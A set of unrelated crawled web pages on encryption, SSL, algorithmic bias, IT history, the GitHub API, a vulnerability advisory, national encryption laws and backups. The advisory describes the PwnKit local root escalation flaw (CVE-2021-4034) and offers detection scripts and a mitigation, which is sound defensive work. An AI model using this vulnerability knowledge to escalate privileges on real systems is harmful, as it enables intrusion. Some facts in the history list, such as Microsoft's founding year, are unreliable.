Web hosting services that offer encryption protections will be imperative as currency becomes increasingly digitized. Smartphones may soon replace credit cards, so having financial data be secure will be essential to the success of that transition. MC Services provides web hosting through secure, encrypted domains that can allow a company to keep its important data secure. In doing so, ecommerce transactions can be performed with confidence. IT consultants can improve cyber security by implementing web programming that treats privacy with paramount importance.
<urn:uuid:d3ec1896-2f7e-4466-a6a4-cc492e72e0e4>
CC-MAIN-2022-40
https://www.mcservices.com/post/fbi-changes-stance-on-encryption
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00652.warc.gz
en
0.954205
319
2.515625
3
SSL certificates are small data files that cryptographically bind a key to an organization's details. When installed on a web server, a certificate activates the padlock icon and allows people to open secure connections between the web server and their browsers. SSL certificates are typically used to secure credit card transactions, data transfers, and logins, especially on social media sites. Additionally, SSL certificates bind information such as domain names, server names, and hostnames to a company name, also known as the organizational identity.

In order for a business's web server and browsers to be secure, it must first install an SSL certificate. Once installed, the certificate establishes a secure connection for all visitor traffic between the web server and the web browser. You will know that the installation was successful when the beginning of your website address changes from "HTTP" to "HTTPS", with the S standing for Secure.

How Do SSL Certificates Work?

SSL certificates work through the use of something known as public key cryptography. Public key cryptography uses a pair of long strings of random numbers: one is known as the private key and the other is known as the public key. The public key is available on your server and your public domain, so everyone can see it. In essence, this means that people can send messages or complete payments online, and even if hackers intercept a message, they will be unable to read it. All they will see is cryptographic code that is, for practical purposes, unbreakable.

Why should businesses look into getting an SSL Certificate

Every established business that holds any sensitive information, takes information from its clients, or accepts payments should definitely consider getting an SSL certificate. Below are the reasons why a business should consider getting an SSL certificate and the work it can do for your business in return:

- Protects your sensitive information and your clients' sensitive information
- Keeps server data secure
- Boosts Google rankings
- Creates more trust between business and customer
- Gives a business better conversion rates

Where can a business buy an SSL Certificate

SSL certificates can be bought from a well-known certificate authority (CA). There is a long list of trusted CA root certificates from which you can get one. To know whether a certificate authority is trustworthy, look for its root certificate on the user's machine. If it is present, the browser can proceed; if it is not, the browser will automatically show an untrusted error message. Knowing this will help build confidence in the website and in your organization and keep consumers from losing confidence in your business.
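To make the key-pair idea concrete, here is a hedged sketch using the third-party Python cryptography package. It only illustrates public-key encryption and decryption; a real SSL/TLS certificate additionally binds identity details and carries a certificate authority's signature, which this sketch omits.

```python
# Sketch of the public/private key pair that underlies an SSL/TLS certificate,
# using the third-party "cryptography" package. The message content is a placeholder.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()  # this half can be shared with anyone

# Anything encrypted with the public key can only be read with the private key,
# which is why an intercepted message looks like unreadable ciphertext.
message = b"card number 4111 1111 1111 1111"
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
ciphertext = public_key.encrypt(message, oaep)
plaintext = private_key.decrypt(ciphertext, oaep)
assert plaintext == message
```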
<urn:uuid:949206cb-7f8a-4018-9dce-08b7db3424fd>
CC-MAIN-2022-40
https://mytekrescue.com/what-is-an-ssl-certificate/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00052.warc.gz
en
0.93993
570
3.046875
3
Machine learning and artificial intelligence are increasingly part of daily life. This emerging technology can improve processes and make them more accurate. That said, it can also exacerbate existing inequities by embedding the unconscious biases of human designers and using data generated in inequitable systems.

Machine learning is the process by which information is introduced to a computer to identify patterns using algorithms. The patterns recognised are called models, which describe the information methodically, allowing predictions about the world beyond the initial data. In circumstances where the product is artificial intelligence, the computer can continuously learn as it performs tasks based on initial models. For example, if the objective is to learn about people's purchasing preferences, providing data on purchase histories to the computer can allow it to identify patterns in similar purchases via grouping algorithms. It can create models of preferences and ultimately recommend similar items to individuals the next time they search for merchandise.

Even in this oversimplification, two sources of algorithmic bias emerge: the original data and the algorithm, both created by humans. So what impacts how fair or biased the technology is?

3 considerations to limit algorithmic bias in health technologies

1. Limitations of the evidence base

The first phase of limiting bias in the technology is understanding the context in which you operate. Often algorithms include assumptions derived from research and literature. There is an inherent assumption that science is definitive, objective, and unbiased; however, science is a process. Building a solid evidence base requires multiple studies on various groups representative of the population, by different researchers, showing similar results over time. Unfortunately, diversity, equity and fairness have historically not been prioritised, and the resulting evidence base is not truly generalisable to everyone. That is why it is crucial to critically evaluate the existing literature for comprehensiveness, fairness and applicability before applying any assumptions. For example, pharmaceutical clinical trials have mainly recruited adult white males; however, the results are generalised to the entire population. Algorithms built upon these results often do not accurately represent underrepresented groups and can lead to unintentionally biased technologies.

2. Limitations of the data sets and algorithms

In the second phase, the limitations of 1) the data from which the computer will learn and 2) the algorithms being used should be considered. While these seem like detailed questions meant for data scientists, the decision's impact on the result is immense; therefore, business segments need to at least be aware of the methods and able to communicate the results with limitations in mind. For example, credit scores are determined through models that attempt to capture financially risky behaviours and poor habits. However, marginalised groups have historically been offered predatory products that lead to the snowballing of debt, which is then reflected in the data. This example is one of many that amplify systemic bias in the data via models and continue to disadvantage one population while advantaging another, especially through a scoring system that is used so frequently and ubiquitously.
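As a minimal, hedged illustration of the kind of check this consideration implies (not a complete fairness audit), the sketch below compares a model's accuracy across groups with pandas; the data, group labels, and column names are invented.

```python
import pandas as pd

# Toy subgroup check: before trusting a model's scores, compare its error rate
# across groups. A large gap is a red flag worth investigating, not proof of bias.
df = pd.DataFrame({
    "group":     ["A", "A", "A", "B", "B", "B"],
    "actual":    [1, 0, 1, 1, 0, 0],
    "predicted": [1, 0, 1, 0, 1, 0],
})

df["correct"] = (df["actual"] == df["predicted"]).astype(int)
by_group = df.groupby("group")["correct"].mean()
print(by_group)                          # accuracy per group
print(by_group.max() - by_group.min())   # gap between best- and worst-served groups
```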
Understanding the context and limitations and tempering the interpretation of the results is an important step that should involve the business unit and company leaders.

3. Impacts of new technology on marginalised communities

The negative impact of tech and algorithmic biases may not be intentional; however, the solution to health inequities should be. Therefore, in the third phase, development and business segments must be diverse and multidisciplinary and include subject matter experts and community stakeholders to contextualise the results and think critically about possible outcomes. Additionally, it is crucial to assess the post-market, real-world evidence after the technologies have been used for some time, and to be transparent and accountable for those outcomes.

For example, there are race-based algorithms for medical decision-making. Ideally, the algorithms lessen disparities, although historically, this has not been the case. For instance, there are models which estimate the kidney's filtration rate to determine if patients require specialised treatment or qualify for transplants. Previously, the model would predict higher filtration rates for Black patients (i.e. they would appear less ill). Unfortunately, the resulting policies led to an increased rate of disease progression and delayed referrals for transplantation for Black individuals. One study estimates that if the models were still used, approximately 68,000 Black adults would not be referred to specialist care (population estimates were calculated based on the Diao et al publication and the American Community Survey ACSDT5Y2020 dataset). At the same time, an additional 16,000 would be ineligible for the transplant waiting list. This outcome is particularly undesirable considering the incidence of End-Stage Kidney Disease is three times higher in Black individuals than in white individuals.

Steps could have been taken earlier to prevent inequitable care from worsening after these clinical practices were implemented, but that's not the overarching theme. The point is that the algorithm's application and potential impact were neither considered thoroughly nor contextualised within the epidemiology and inequity of kidney failure.

Beyond algorithmic biases

As data science becomes a prevalent tool, organisations should ensure that those technologies don't simply automate existing algorithmic biases. By working through these three key considerations, having multidisciplinary teams and staying accountable after the technology is in use, organisations can help mitigate algorithmic bias, prevent exacerbation of existing inequities and help create a more equitable environment.

Most importantly, the ubiquity of data science across all industries is here to stay. Therefore, to maximise its use for transformative outcomes and avoid beginner missteps, all companies should invest in better understanding of data science at every level.
<urn:uuid:89a9d4e0-79d3-4f6a-977a-256534bfae5d>
CC-MAIN-2022-40
https://www.theee.ai/2022/09/13/20222-three-considerations-when-erasing-bias-in-emerging-tech/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00052.warc.gz
en
0.938722
1,139
3.625
4
1 ICANN, the Internet Corporation for Assigned Names and Numbers, assumes responsibility for coordinating the domain naming system in 1998. ICANN registers top-level domains such as .com, .org, .net and varieties of other dots.

2 The Electronic Numerical Integrator and Computer (ENIAC), one of the first digital computers, shuts down in 1955. Commissioned in 1943 by the Army's Ballistics Research Laboratory to produce firing and bombing tables during World War II, ENIAC was finally ready for operation in 1946, months after the war ended.

4 The Soviets launch the satellite Sputnik from Kazakhstan in 1957, making it the first man-made satellite to orbit the Earth. Sputnik orbited 500 miles above the earth for about three months and initiated the space race.

6 Seymour Cray, who introduced the first supercomputer in 1976, dies in a car accident in 1996. The Cray 1 could calculate 240 million arithmetic operations per second.

9 Alexander Graham Bell, in 1876, conducted the first telephone conversation over outdoor telegraph lines. Bell, in Boston, was talking to his assistant Thomas Watson, who was two miles away in Cambridge, Mass.

13 Spreadsheet Lotus 1-2-3 is unveiled in 1982 and quickly becomes the leading spreadsheet. Roughly 1-2-3 years later, in 1985, Microsoft introduced its rival Excel spreadsheet.

15 The first radio paging service starts in 1950. Twenty-five miles outside New York City, a doctor on a golf course receives the first page via a six-ounce receiver in his pocket, thus paving the way for beepers of the future.

18 Thomas Edison dies in 1931 at the age of 84 in West Orange, N.J. Edison invented the electric lightbulb, universal stock ticker, phonograph, electrical vote recorder, automatic telegraph system, electric safety miner's lamp, motion picture camera, nickel-iron-alkaline storage battery and the carbon telephone transmitter.

19 In 1998, the Justice Department's antitrust trial against Microsoft begins. The government accuses Microsoft of pressuring PC makers to use its Explorer browser instead of Netscape's Navigator.

20 The first fully automated post office system is put into use in Providence, R.I., in 1960. The experimental project cost $20 million and sorted mail at a rate of 18,000 pieces per hour.

22 Chester Floyd Carlson makes the first Xerox copy in Queens, N.Y., in 1938 by pressing wax paper against an electrostatically charged plate covered in dark powder. The copy read "10-22-38, Astoria." In 1947, Carlson licensed his process to the Haloid Co., which later became Xerox.

28 William Henry Gates III is born in 1955 in Seattle. Gates became the wealthiest American by age 35. Gates dropped out of Harvard University in 1975 to market the Basic computer language compiler with childhood friend Paul Allen. They founded Microsoft in 1977. By 1981, IBM was running Microsoft DOS on the IBM PC. The rest, as they say, is history.

Sources: HistoryChannel.com, Internet Archive, Tesla Memorial Society of New York, The Antique Advertiser, Free Online Dictionary of Computing (FOLDOC), History of Computing Foundation, Edison Birthplace Association, O'Melveny & Myers, Bato Balani Interactive
<urn:uuid:9483d849-d281-4379-8ba0-449d12e4460a>
CC-MAIN-2022-40
https://www.cio.com/article/270344/internet-this-date-in-it-history-oct.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00052.warc.gz
en
0.895864
696
3.15625
3
If you’re using GitHub, it’s crucial that you understand how GitHub APIs work. These APIs can be used for basic and advanced development on GitHub. This in-depth guide will teach you everything you need to know about GitHub APIs and how to use them, including real examples you can model.

What is GitHub API Anyway?

Before we dive into the specifics of GitHub APIs, I want to make sure you have a firm grasp of APIs as a whole. API is an acronym that stands for “Application Programming Interface.” Developers rely on APIs to access various web tools and information in the cloud. In simple terms, an API makes it possible for applications on different platforms to communicate with each other. Whenever someone uses an application on their phone or computer, the app connects to the internet and communicates with a server. The server retrieves and interprets the requested data, then sends it back to the user’s device in a readable format. All of this happens through an API.

Here’s one of my favorite analogies to explain how an API works: Let’s say you’re going out to dinner. You’re seated at a table with a menu full of options to choose from. The kitchen will ultimately prepare your meal, but someone needs to tell them what you want. The waiter takes your order and tells the kitchen what to do. Finally, the waiter brings your food to the table from the kitchen. In this scenario, the waiter is the API. It’s their job to communicate between two different “platforms” and deliver a response from one to the other in a “readable” format (in this case, an edible format).

Let’s apply this same concept to a real-life example of an API. I’m sure you’ve used the internet or an app to book a flight online. If you go directly to an airline’s website, like Delta or Southwest, you’ll input the dates, choose your destination, view the flight times, compare the costs, and select your seat. Behind the scenes, the website is interacting with the airline’s database for flight availability. Now let’s say you don’t use an airline’s website. Instead, you use a third-party travel site, like Booking.com or Expedia. How does this third-party site aggregate the flight information from different airline databases? This is possible with an API. Expedia’s application uses APIs to connect with Delta, Southwest, United, American Airlines, and other options for your request. The API takes the information you’re asking for, requests it from the different servers, and sends back a readable format that you can use to compare flight options.

How GitHub API Works

GitHub APIs make it possible for developers to interact with GitHub. You can use these APIs to create and manage new repositories, issues, pull requests, branches, and so much more. For example, you can use a GitHub API to fetch information available to the public through a public repository on GitHub.

There are two different versions of the GitHub API: a REST API and a GraphQL API. The REST API, also known as the GitHub RESTful API, is an application program interface that adheres to the REST architecture style, allowing interaction with various RESTful web services. REST stands for “representational state transfer.” GitHub REST APIs typically use HTTP requests to handle the following:

- GET — Retrieve a resource
- PUT or PATCH — Update a resource
- POST — Create a resource
- DELETE — Remove a resource

The GraphQL API offers a bit more flexibility for GitHub developers. It allows you to define exactly what data you want and only the data you want.
Rather than using multiple REST requests, the GraphQL API makes it possible to fetch data with a single call. Here’s a brief overview of the GraphQL data query language:

- Spec — A specification that validates the schema on the API server. That schema ultimately determines if the client calls are valid.
- Strongly Typed — Defines the type system of the API and its object relationships.
- Introspective — The client can query the schema for its details.
- Hierarchical — GraphQL calls have a shape that mirrors the JSON data that gets returned. Using nested fields, you can query for and retrieve data in the same round trip.

GraphQL is not technically a storage model or query language for databases in terms of the application layer. It refers to the graph structure defined by the schema. Nodes define the objects, and edges define the relationships between objects. The GraphQL API returns data to the application based on those schema definitions, regardless of how the data gets stored.

Here’s the base URL for the GitHub API: https://api.github.com/

Now let’s take a look at some different examples of the GitHub API:

Example #1: Access Publicly Available Information

Arguably the most common use case for GitHub APIs is accessing public information. To get public information with the GitHub API, you do not need an authentication token. Some examples of public information you can retrieve with a GitHub API include:

- User information from a username
- Information about a user’s follower list
- See if one user follows another

In these examples, you’d be able to see a JSON response with basic information like a user’s name, email address, and image URL.

Example #2: Run Tasks as an Authenticated User

If you have an authentication token, you don’t need to provide your username in the endpoints, like you would for public information. By using a token instead, you’ll have the ability to do things like:

- Create a repository
- List issues assigned to your account
- Create a new issue
- Comment on an existing issue
- Open or close an issue

I’ll explain how to create an authentication token in greater detail shortly. We’ll also cover more examples of what you can do once you authenticate the API with a token.

How to Get Started With GitHub API

Now that you understand what the GitHub API is and how it works, let’s focus on getting you started with your first GitHub API. The following steps will walk you through the concepts associated with using GitHub APIs and building momentum. By following this tutorial, you can apply the same steps and concepts to your specific use cases.

Step 1: Test Your Setup and Get Organized

The first thing you need to do is verify that you’re ready to start using GitHub APIs. So you can start by opening a new command prompt and entering something basic. In this example tutorial, you can start with this: https://api.github.com/zen

You should see a random design philosophy from GitHub. I did this a few times and saw responses like:

- Design for failure.
- Mind your words; they are important.
- Avoid administrative distraction.

As long as you get a similar response here, you’re on the right track so far. Now let’s take this test one step further, and get some information from a public user profile. For this test, we’ll look at Chris Wanstrath—the co-founder of GitHub. We can use this API in the command line: https://api.github.com/user

Then we just need to add #GET and Wanstrath’s username, defunkt, which will look like this:

Then you can add -i after the $ curl to include headers.
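For readers who prefer Python to curl, here is a rough, hedged equivalent of this first test using the third-party requests package. This sketch is not from the original guide; the Accept header is simply GitHub's documented JSON media type.

```python
import requests  # third-party package

# Unauthenticated GET for the public profile of user "defunkt" over the REST API.
# Printing the status and a rate-limit header roughly mirrors what curl -i shows.
resp = requests.get(
    "https://api.github.com/users/defunkt",
    headers={"Accept": "application/vnd.github+json"},
    timeout=10,
)
print(resp.status_code)
print(resp.headers.get("X-RateLimit-Remaining"))  # unauthenticated callers get 60/hour
user = resp.json()
print(user["login"], user["name"], user["html_url"])
```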
The response returns the user’s public profile details as JSON.

You’ve now used a GitHub API for two different test purposes. First, you retrieved a random design philosophy quote. Then you used the user API to get information about a specific user profile.

Step 2: Create Personal Access Tokens and Authenticate

If you want to get the most out of the GitHub API, you’ll need authentication. If you’re unauthenticated, you can only make 60 requests per hour, which isn’t really enough if you want to do anything practical or interesting. The simplest way to authenticate with the GitHub API is through personal access tokens. You can do this by leveraging Basic Authentication via OAuth since OAuth tokens also include personal access tokens.

To create a new personal access token, navigate to your GitHub account’s personal access token settings. GitHub recommends that you set an expiration for the token as a way to keep your personal information safe and secure. API requests with a personal access token will have a header for GitHub-Authentication-Expiration. Using this in your scripts can help warn you when a token is close to expiring.

Tokens can be used in place of a password for Git over HTTPS. They also work to authenticate the API. It’s really important that you take your time when choosing the permissions and scope of the token. You should also treat your tokens like passwords. They should be kept in a secure environment when you’re not using them. If a token falls into the wrong hands, it could be destructive for your account.

Once you’ve created the personal access token, you should see the request limit jump to 5,000 requests per hour. This increase will make it easier for you to read, write, and access private info using the GitHub API. From here, you can follow the same process we took in the previous step to #GET Chris Wanstrath’s profile. Only this time, we’ll #GET your user profile. Just add your username and access token to the API request. Now you should see non-public data about your profile in the response. For example, you should see a response line for “Plan” that shows the details of your specific GitHub plan.

You can also use OAuth tokens for applications that need to read or write private info using the API. These tokens offer revocable access and limited access. For the purpose of an application, revocable access allows an end-user to remove authorization to a third-party app at any time. The limited access lets the end-user review the access that a token will provide before granting authorization to the third-party app.

You can create these tokens with a web flow. An app will send users to GitHub for logging in. Then a message will appear showing the name of the app and the access levels it’s requested. Once authorized by the user, GitHub will automatically redirect the user back to the app.

Step 3: Get Repositories

Similar to increasing your request per hour count, any meaningful use case of the GitHub API will involve repositories. One of the most common use cases here is fetching a repository. You can use this to view repositories for an authenticated user, list repositories for a different user, or list repositories for an entire organization.

The information that returns from your call depends on the scope of the tokens that you authenticated. For example, a public repository scope will generate a response for all public repositories that you can access from GitHub.com. A general “repo” scope will show both public and private repositories that you have access to on GitHub.com.
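As a hedged Python sketch of an authenticated call covering Steps 2 and 3 (again using the requests package rather than the guide's curl commands), the token below is a placeholder and should come from a secure store, never be hard-coded, and be scoped and set to expire as described above.

```python
import requests

TOKEN = "ghp_xxxxxxxxxxxxxxxxxxxx"  # placeholder personal access token

# List repositories visible to the authenticated user; what comes back depends on
# the token's scopes, as described above.
resp = requests.get(
    "https://api.github.com/user/repos",
    headers={
        "Accept": "application/vnd.github+json",
        "Authorization": f"token {TOKEN}",
    },
    timeout=10,
)
resp.raise_for_status()
for repo in resp.json():
    print(repo["full_name"], "(private)" if repo["private"] else "(public)")
print(resp.headers.get("X-RateLimit-Limit"))  # should read 5000 once authenticated
```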
You can add a parameter that will narrow the results. For example, you could fetch only repositories you directly own, organizational repositories, or repositories used for team collaboration. Here’s a sample code request to show you what I mean:

$ curl -i "https://api.github.com/users/defunkt/repos?type=owner"

In this case, we’re only fetching repositories owned by user defunkt.

In addition to fetching an existing repository, the GitHub API also allows you to create a new repository. To do this, you need to POST JSON code related to the confirmation and details of the new repository. For example, you’ll need to give it a name and determine whether or not the repository is public or private. If you create a private repository, you need to authenticate it to see it when you’re trying to retrieve information using the API. To prevent the leaking of private information, the GitHub API will return a 404 error and a “Not Found” message if you try to request information without authentication.
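The repository-creation step can be sketched in Python as well. This is a hedged example rather than the article's own code: the token and repository details are placeholders, and the JSON fields shown (name, description, private) match the description above.

```python
import requests

TOKEN = "ghp_xxxxxxxxxxxxxxxxxxxx"  # placeholder personal access token

# POST to /user/repos with the new repository's details as JSON.
resp = requests.post(
    "https://api.github.com/user/repos",
    headers={
        "Accept": "application/vnd.github+json",
        "Authorization": f"token {TOKEN}",
    },
    json={
        "name": "my-test-repo",               # placeholder repository name
        "description": "Created through the REST API",
        "private": True,
    },
    timeout=10,
)
print(resp.status_code)  # 201 on success; unauthenticated requests for private data get 404
print(resp.json().get("html_url"))
```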
<urn:uuid:6f5d6be2-1e93-447f-965d-f06a45a3413c>
CC-MAIN-2022-40
https://nira.com/github-api/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00253.warc.gz
en
0.860168
2,610
2.671875
3
What is PwnKit Vulnerability CVE-2021-4034?

On January 25th, 2022, a critical vulnerability in polkit's pkexec was publicly disclosed. The Qualys research team named this vulnerability "PwnKit". The polkit package is meant for handling policies that allow unprivileged processes to communicate with privileged processes on Linux systems. Pkexec is part of polkit and handles the execution of commands in different user contexts following the polkit-defined policies. Vulnerable machines include installations of Ubuntu, Debian, Fedora, CentOS and more.

Why is it a dangerous vulnerability?

By exploiting this vulnerability, attackers on a vulnerable host could easily gain full root privileges from any unprivileged user. The vulnerability has been widely discussed, and we believe malicious actors could start using it on vulnerable machines. A POC of the exploitation was also published publicly on GitHub. Therefore, organizations and their security teams are advised to check all of their Linux-based machines and make sure they aren't vulnerable.

What is "PwnKit-Hunter" and how can it help me?

PwnKit-Hunter is a set of tools that will help determine if your system's polkit package is vulnerable to CVE-2021-4034, a.k.a. PwnKit. The detection scripts can be found here: https://github.com/cyberark/PwnKit-Hunter

The tools are:

- CVE-2021-4034_Finder.py: This script uses your apt cache to find the currently installed version of polkit and compare it to the patched version for your distribution.
- PwnKit-Patch-Finder.c: The Debian and Ubuntu patches for CVE-2021-4034 contain a new exit() line that is reached only if the policykit-1 package is patched. This code tries to trigger that exit() and checks for the expected exit code. If pkexec exits with a different code, the package needs to be updated. DISCLAIMER: This script only works on Debian and Ubuntu variants, as other distros patched the code in a different way.

How to run "PwnKit-Hunter"

git clone https://github.com/cyberark/PwnKit-Hunter.git
cd PwnKit-Hunter
./CVE-2021-4034_Finder.py

git clone https://github.com/cyberark/PwnKit-Hunter.git
cd PwnKit-Hunter
gcc PwnKit-Patch-Finder.c -o PwnKit-Patch-Finder
./PwnKit-Patch-Finder

What is the mitigation?

The recommended fix is to update your systems according to the security advisories of your Linux distribution. NIST Advisory: https://nvd.nist.gov/vuln/detail/CVE-2021-4034

In order to mitigate it without updating, remove the setuid permission from pkexec:

chmod 0755 $(which pkexec)

To help ensure that the fix was fully deployed, CyberArk Labs developed simple scripts to detect and check whether a scanned host is vulnerable. The "PwnKit-Hunter" scripts are in the GitHub repository linked above.
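As a hedged companion check (not part of PwnKit-Hunter), the small Python sketch below verifies whether the interim mitigation took effect by inspecting pkexec's setuid bit. It only looks at file permissions and does not prove the polkit package itself is patched.

```python
import os
import shutil
import stat

# Check whether pkexec still carries the setuid bit after applying the chmod mitigation.
pkexec = shutil.which("pkexec")
if pkexec is None:
    print("pkexec not found on PATH")
else:
    mode = os.stat(pkexec).st_mode
    if mode & stat.S_ISUID:
        print(f"{pkexec} is still setuid ({oct(mode & 0o7777)}); update polkit or chmod 0755 it")
    else:
        print(f"{pkexec} is not setuid ({oct(mode & 0o7777)})")
```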
From private conversations through the likes of WhatsApp to confidential browsing histories through VPNs, encryption plays an integral role in our freedom of expression and privacy. Yet, with ongoing government attempts to create "backdoors" into encryption services/products, many countries face severe restrictions when it comes to using apps and tools that utilize cryptography. To find out where the heaviest restrictions are, our team of researchers has analyzed over 200 countries' legislation to see:
- Which countries require manufacturers/sellers to get a license before producing or selling cryptography products/services
- Which countries have import and/or export restrictions on cryptography products/services
- Which countries don't have a personal use exemption on travel with encrypted laptops
- Which countries place obligations on providers to hand over encryption keys for law enforcement purposes (factoring in whether a warrant is required for this)
- Which countries place obligations on end users to hand over encryption keys for law enforcement purposes (factoring in whether a warrant is required for this)
What did we find? The vast majority of countries have some kind of restriction on encryption technologies, whether it's import/export laws or law enforcement access to encrypted data. More severe restrictions are noted in places one might expect them, such as Russia and China, but heavy restrictions are in place across many other countries, too. And with more and more legislation and investigative powers being introduced, restrictions are only set to increase in the coming months and years. For example, while Brazil ranks as one of the "freer" countries due to its current legislation, this is in spite of attempts to impose further restrictions. Recent court orders have tried to block WhatsApp, and Facebook also faced a legal battle with the country due to its lack of cooperation in a criminal investigation (which even resulted in the Vice President of Facebook being arrested). In short, many countries may grant citizens the right to freedom of speech and privacy, but thwart this when it comes to encryption, citing national security and serious crimes as the reason. Which countries require encryption providers to decrypt data for law enforcement purposes? One of the biggest concerns when it comes to encryption is the access granted to law enforcement agencies, whether it be by decryption key or a requirement for providers to decrypt the data for them. As the below map shows, a large number of countries have at least some potential access to providers' encryption keys. A handful of countries, including China and Russia, have unprecedented access to decrypted data. In Russia, for example, the Sistema Operativno-Rozysknykh Meropriyatii (SORM, the System for Operational-Investigative Activities) gives the Russian federal security service, the FSB, access to electronic messages and the keys to decrypt these without judicial authorization. Many European, Asian, and African countries, as well as the United States, have laws that enable law enforcement to request that providers hand over encryption keys and/or decrypt data. In the United Kingdom, a number of laws grant law enforcement the right to request that encryption technologies be removed from various communications.
Section 49 of the Regulation of Investigatory Powers Act 2000 states that when protected information is in the possession of law enforcement, they can, with written permission from a judge, impose a disclosure requirement for data to be produced in intelligible form. Law enforcement must have reasonable grounds to believe that someone possesses the key to the protected information, that disclosure is necessary for national security, detecting/preventing a crime, or that it is in the interest of the UK's economic well-being, that disclosure is proportionate to what's sought to be achieved, and that disclosure isn't possible without imposing the order. In the United States, Section 103(a) of the Communications Assistance for Law Enforcement Act of 1994 provides that communications providers must ensure intercept capabilities when issued with court orders or other such lawful authorization. However, "A telecommunications carrier shall not be responsible for decrypting, or ensuring the government's ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication." Most laws carry the same power as that of the United States, placing requirements on providers to decrypt any data that they have encrypted themselves but not data that is encrypted by other providers or the users themselves. A number of other countries impose ambiguous laws that provide the potential for law enforcement to request the disclosure of encrypted information, or the laws have been interpreted in such a way. For instance, in the European Union, the Council Resolution of 17 January 1995 on the Lawful Interception of Telecommunications offers some guidance on the laws that should have been implemented in EU countries. The resolution states that "If network operators/service providers initiate encoding, compression or encryption of telecommunications traffic, law enforcement agencies require the network operators/service providers to provide intercepted communications en clair." En clair means "in plain language" and can therefore be interpreted to mean decrypted. Which countries require encryption users to decrypt data for law enforcement purposes? It's a similar picture when we look at law enforcement powers to request decryption keys or decrypted data from users of encrypted services/products. The laws tend to cover communications or access to computers, requiring those in possession of a key to hand it over to law enforcement upon request or to aid them in the decryption process. Again, some countries don't have specific laws but do have ambiguous laws in place. In other cases, countries may rely more heavily upon service providers to hand over the data, for example in the United States, where no law explicitly grants law enforcement the power to require users to hand over decrypted data or keys. Ultimately, getting "backdoor" access to encryption providers' data is the easiest way to access encrypted data, which is why a worrying number of countries are trying to implement such measures. This includes:
- India's ongoing battle with WhatsApp
- Brazil's recent court orders to try and block WhatsApp, and its current "Fake News" bill, which attempts to break end-to-end encryption
- The United States' bill for backdoor access to encrypted data (submitted to Congress in June 2020).
Which countries require licenses for producing or manufacturing encryption services/products?
A large number of African, Middle Eastern, and Asian countries have sweeping licensing requirements. This means the majority of sellers or manufacturers of cryptography products must obtain a license before distributing. France also has such a requirement: any person who wishes to provide cryptography services must declare this to the Prime Minister. Some countries, e.g. Turkey, Ethiopia, Tunisia, and Mali, have some licensing requirements but don't require all providers of cryptography services to obtain a license. For example, in Tunisia, any business importing cryptography products for its own personal use (or temporary use) doesn't require a license. A number of countries have also enacted laws that enable the relevant ministries to create licensing requirements for cryptography services but don't appear to have put anything into place as of yet. This includes the Bahamas and Barbados. Which countries have import/export limitations for cryptography services/products? A far greater number of countries have some kind of limits when it comes to importing and/or exporting cryptography products (or products that contain cryptography but aren't solely for encryption purposes). In most cases, this requires a business to register its company and product with the designated agency within the country they're importing to or exporting from. This may also include some technical specifications. Quite a few countries with large-scale requirements for cryptography licenses also impose severe restrictions on the import and export of these products. For example, for countries within the Eurasian Economic Union (EAEU) — Armenia, Belarus, Kazakhstan, Kyrgyzstan, and Russia — an import/export license, permit, and registration of notification are required, and various details are also analyzed, including a list of cryptographic algorithms, the maximum key length, a list of implementing protocols, how the encryption is employed, what type of data is encrypted, and how the data is encrypted. The vast majority of countries with customs laws restrict exports of cryptography products and/or limit imports from designated countries. A large number are part of the Wassenaar Arrangement (for a full list, see the methodology section) and/or are governed by EU law. Those who have signed up to the Wassenaar Arrangement:
- Have agreed to maintain national export controls on certain items, such as cryptography services
- Have agreed to report on transfers and denials of specified controlled items to destinations outside the Arrangement
- Exchange information on sensitive dual-use goods and technologies
Again, a number of countries have laws in place that will enable them to create import/export requirements for cryptography products but don't appear to have put anything in place as of yet. Which countries don't have a "personal use exemption" for those traveling with encrypted laptops? As well as imposing import/export restrictions on businesses offering encryption services, some countries also have clear restrictions for those traveling with encrypted laptops. In contrast, some of the countries that are part of the Wassenaar Arrangement offer travelers a "personal use exemption." Please note: while clear restrictions/exemptions are offered in the above countries, travel to other countries may or may not be restricted. It is always best to check with the country you're traveling to beforehand, regardless of whether or not it is part of an agreement.
To determine the laws in place across each category, we have analyzed various pieces of legislation in each country. This includes Criminal Procedure Codes, laws on cybercrime, Communication/Telecommunication Acts, Interception/Surveillance Acts, and any other relevant decrees, acts, laws, or resolutions. We have focused solely on legislative powers/orders and those that primarily affect communications providers, internet service providers, or data stored on/accessed through computers. A country may not have such legislation or may appear to have protections in place, but the picture may be different in practice. However, to avoid being subjective in our results, we have only used what is "legally" permitted within each country. As mentioned, we have also looked at legislation that can be interpreted to cover encryption, even if it doesn't mention it specifically. In these cases, we have looked for ambiguous wording, such as requirements to make data "intelligible", or we have found examples of telecommunications providers, e.g. Vodafone, interpreting the law to suggest they believe law enforcement could request they decrypt data within the country. Where nothing has been found, we have omitted the country from the results. The lack of legislation could suggest that there are no restrictions/law enforcement powers, but for accuracy, we haven't included these countries. For a full list of sources, please visit our spreadsheet: https://docs.google.com/spreadsheets/d/1dcPIqWYJ5fe0HY6pCbWixTi6B9U9yX7FLURBbko5d1g/edit?usp=sharing
by Jason Kohrs
The data on your hard drive is the most critical item inside your computer, and the only item which cannot be replaced. It may be an unwanted hassle and expense to replace a defective memory module, monitor, or processor, but there is no replacing data once lost.
In addition to the possibility of a simple hard drive failure, the threat of internet-borne worms and viruses has become an increasing risk of data loss or corruption. Although you may not be able to provide absolute protection for your hard drive, there are various ways that you can ensure that the data on your hard drive is protected. Five methods of backing up your data are summarized below.
1. USB Flash Drives
